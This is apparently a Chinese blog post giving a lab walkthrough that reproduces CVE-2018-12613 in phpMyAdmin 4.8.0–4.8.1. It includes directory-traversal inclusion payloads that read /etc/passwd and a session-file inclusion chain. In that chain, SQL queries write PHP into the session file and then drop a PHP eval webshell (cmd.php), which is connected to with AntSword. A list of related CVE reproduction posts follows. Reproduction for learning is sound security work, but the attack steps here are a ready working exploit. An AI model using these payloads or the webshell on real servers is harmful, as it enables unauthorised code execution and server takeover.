漏洞复现CVE2018-12613

最新推荐文章于 2024-06-14 11:17:39 发布
最新推荐文章于 2024-06-14 11:17:39 发布
阅读量66 收藏
点赞数
文章标签: android 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77565393/article/details/131476065
版权

漏洞描述

在4.8.2之前的phpMyAdmin 4.8.x中发现了⼀个问题,攻击者可以在其中包含(查看并可能执⾏)服务

器上的⽂件。该漏洞来⾃⻚⾯重定向和在phpMyAdmin中加载的部分代码,以及对列⼊⽩名单的⻚⾯的

不正确测试。除“ $ cfg [‘AllowArbitraryServer’] = true”情况(攻击者可以指定他/她已经控制的任何主

机,并在phpMyAdmin上执⾏任意代码)外,攻击者还必须经过身份验证。 [‘ServerDefault’] = 0“的情

况(绕过登录要求,并在没有任何身份验证的情况下运⾏易受攻击的代码)。

影响版本

phpMyAdmin 4.8.0 和4.8.1

启动环境

docker-compose up -d

出错的话把权限改满

chmod -R 755 phpmyadmin

192.168.10.128:8080

?target=sql.php?/../../../../../../../../../etc/passwd

利⽤session写⼊shell的⽅式进⾏getshell

执⾏sql语句

SELECT "<?php phpinfo();?>"

我们进⼊docker容器中,查看web服务器下的tmp⽂件,查看我们的session

cat查看session⽂件可以看到我们刚才查询的php代码

利⽤payload尝试包含session⽂件,出现phpinfo

/index.php?target=sql.php?/../../../../../../../../../tmp/sess_c87cc98234a0
0983ae583e33888ac29f

写⼊webshell

select "<?php file_put_contents('/var/www/html/cmd.php','<?php @eval($_POST
[pass]);?>')?>"

然后再次包含session⽂件

/index.php?target=sql.php?/../../../../../../../../../tmp/sess_c87cc98234a0
0983ae583e33888ac29f

访问cmd.php

连接蚁剑

pink三石
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[ vulhub漏洞复现篇 ] PHPmyadmin文件包含漏洞CVE-2018-12613
qq_51577576的博客
10-06 648
[ vulhub漏洞复现篇 ] PHPmyadmin文件包含漏洞CVE-2018-12613 在4.8.2之前的phpMyAdmin 4.8.x中发现了一个问题,攻击者可以在其中包含(查看并可能执行)服务器上的文件。该漏洞来自页面重定向和在phpMyAdmin中加载的部分代码,以及对列入白名单的页面的不正确测试。除“ $ cfg [‘AllowArbitraryServer’] = true”情况(攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码)外,攻击者还必须经过身份验证。
OpenSSH 用户名枚举漏洞复现CVE-2018-15473)
千寻的博客
03-06 2663
文章目录漏洞名称漏洞编号漏洞描述影响版本环境搭建漏洞复现修复建议学习笔记链接摘抄 漏洞名称 OpenSSH 用户名枚举漏洞 漏洞编号 CVE-2018-15473 漏洞描述 OpenSSH(OpenBSD Secure Shell)是OpenBSD计划组所维护的一套用于安全访问远程计算机的连接工具。 该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效阻止窃听、连接劫持以及其他网络级的攻击。 OpenSSH 7.7及之前版本中存在用户枚举漏洞,该漏洞源于程序会对有效的和无效的用
CVE-2018-12613(远程文件包含)
weixin_59872639的博客
03-01 235
受影响版本 phpMyAdmin 4.8.0和4.8.1 环境 Vulhub - Docker-Compose file for vulnerability environment 漏洞利用 ?target=db_sql.php%253f/../../../../../../../../etc/passwd 因为`%253f`二次url解码后是`?`,整体变成 ?target=db_sql.php?/../../../../../../../../etc/passwd ...
phpMyAdmin 4.8.1 远程文件包含 CVE-2018-12613 漏洞复现
Senimo
12-11 1347
漏洞复现 phpMyAdmin 4.8.1 远程文件包含 CVE-2018-12613 APP:phpMyAdmin 4.8.1 CVECVE-2018-12613 类型:远程文件包含 下载phpMyAdmin 4.8.1源码 漏洞问题出现在index.php页面55~63: // If we have a valid target, let's load that script instead if (! empty($_REQUEST['target']) && is_str
CVE-2018-12613 本地文件包含漏洞复现+漏洞分析
qq_39407165的博客
06-07 126
phpMyAdminphpMyAdmin团队开发的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。CVE-2018-12613,这是一个在phpMyAdmin4.8.x(4.8.2之前)上发现的文件包含漏洞,攻击者可以利用该漏洞在后台进行任意的文件包含。也就也为着攻击者可以通过webshell直接拿下搭建了该服务的站点。
Weblogic反序列化漏洞原理分析及漏洞复现(CVE-2018-2628/CVE-2023-21839复现)
rumil的博客
09-19 5591
WebLogic 存在远程代码执行漏洞CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。远程方法调用,除了该对象本身的虚拟机,其它的虚拟机也可以调用该对象的方法。
uWSGI 漏洞复现CVE-2018-7490)
ak.Gh0st的博客
10-31 1267
uWSGI是一个Web服务器,它实现了WSGI协议、uwsgi、http等协议。Nginx中HttpUwsgiModule的作用是与uWSGI服务器进行交换。WSGI是一种Web服务器网关接口。它是一个Web服务器(如nginx,uWSGI等服务器)与web应用(如用Flask框架写的程序)通信的一种规范。选项,导致攻击者可以通过带有…序列的特制URL请求,达到目录遍历效果。通过nuclei对网站进行扫描,发现存在CVE-2018-7490漏洞。通过访问根目录的key.txt,获取key值。
漏洞复现----6、Jenkins远程命令执行漏洞CVE-2018-1000861)
七天
11-25 4372
文章目录一、Jenkins简介二、CVE-2018-1000861简介三、漏洞复现 一、Jenkins简介 Jenkins是一个独立的开源自动化服务器,由JAVA开发。 可用于自动化各种任务,如构建,测试和部署软件;也可以根据设定持续定期编译,运行相应代码;运行UT或集成测试;将运行结果发送至邮件,或展示成报告等。 Jenkins可以通过本机系统包Docker安装,也可以通过安装Java Runtime Environment的任何机器独立运行。 在很多中大型金融企业中普遍使用Jenkins来作为项目发
CVE-2018-12613Phpmyadmin后台 任意文件包含漏洞复现
weixin_55821558的博客
04-26 737
环境:php 5.5.30 工具:phpstudy(小皮面板) 这个漏洞是源于phpmyadmin中的index.php,下面是源码: 以上进行一下分析: 1.传入的target不能为空 2.必须是一个字符串 3.不能以index开头 4.不能再数组target_blacklist中 5.且经过checkPageValidit检查后为真 首先前三个都很好理解 我们先看一下第四个 黑名单为: 在index.php中,已经事先定义了target_blacklist的值,即import.php和ex
WebLogic漏洞复现CVE-2018-2894)
AmyBaby00的博客
12-11 1957
Weblogic任意文件两种上传漏洞CVE-2018-2894) 简介: 1、漏洞描述 2、环境搭建、安装配置/安装域 3、漏洞复现 一、漏洞描述: WebLogic管理端未授权的两个页面存在任意上传getshell漏洞,可直接获取权限。两个页面分别为/ws_utc/begin.do,/ws_utc/config.do,利用该漏洞,可以上传任意jsp、php等文件,并获取服务器权限。 影响版本 ...
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
通过升级openssh到OpenSSH8.4 修复openssh低版本的漏洞 openssh8.4需要的 openssl-1.1.1g, openssh-8.4p1,zlib-1.2.11
Java中如何调用mysql中函数
codedadi的博客
06-10 741
前端直接调用 MySQL 中的函数是不直接可能的,因为前端(如 JavaScript 在浏览器中)没有直接访问数据库的能力。请注意,安全性是这种交互中的一个重要考虑因素。确保你的后端 API 是安全的,并验证所有传入的请求和参数以防止潜在的安全风险,如 SQL 注入攻击。设置CallableStatement的参数(如果需要):如果你的函数需要参数,使用CallableStatement的setXXX方法来设置它们。在你的后端服务中,编写一个 API 端点,该端点调用 MySQL 数据库中的函数。
PHP中的while循环:用法、技巧与最佳实践
最新发布
NatLindsay的博客
06-14 323
在PHP编程中,while循环是一种基本且常用的控制结构,用于重复执行代码块,直到指定条件为假。while循环在处理未知迭代次数的任务时特别有用,例如读取文件内容、处理用户输入或动态生成数据等。与for循环不同,while循环适用于那些无法预先确定循环次数的情境。,只要条件为真,循环体内的代码就会被一遍又一遍地执行。理解和灵活运用while循环,可以帮助开发者更高效地处理重复性任务,提高代码的可读性和维护性。
【MySQL】服务器配置和管理
p_fly的博客
06-09 820
MySQL服务器通常说的是mysqld程序。mysqld 是 MySQL 数据库服务器的核心程序,负责处理客户端的请求、管理数据库和执行数据库操作。管理员可以通过配置文件和各种工具来管理和监控 mysqld 服务器的运行本文将介绍下面三个内容:服务器启动选项:可以在命令行和配置文件中指定,用于配置服务器的行为和特性。服务器系统变量:反映了启动选项的当前状态和值,其中一些变量可以在服务器运行时修改。服务器状态变量:包含了关于运行时操作的计数器和统计信息。
Android.基本用法学习笔记
2301_78955442的博客
06-10 444
先在strings.xml声明变量方法1.方法2.
PHP 输入验证漏洞 CVE-2018-10547复现
10-24
PHP 输入验证漏洞 CVE-2018-10547是一种远程代码执行漏洞,攻击者可以通过构造恶意IMAP服务器名称来注入任意OS命令语义,从而执行任意代码。以下是复现漏洞的步骤: 1. 构造恶意IMAP服务器名称,包含“ -...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值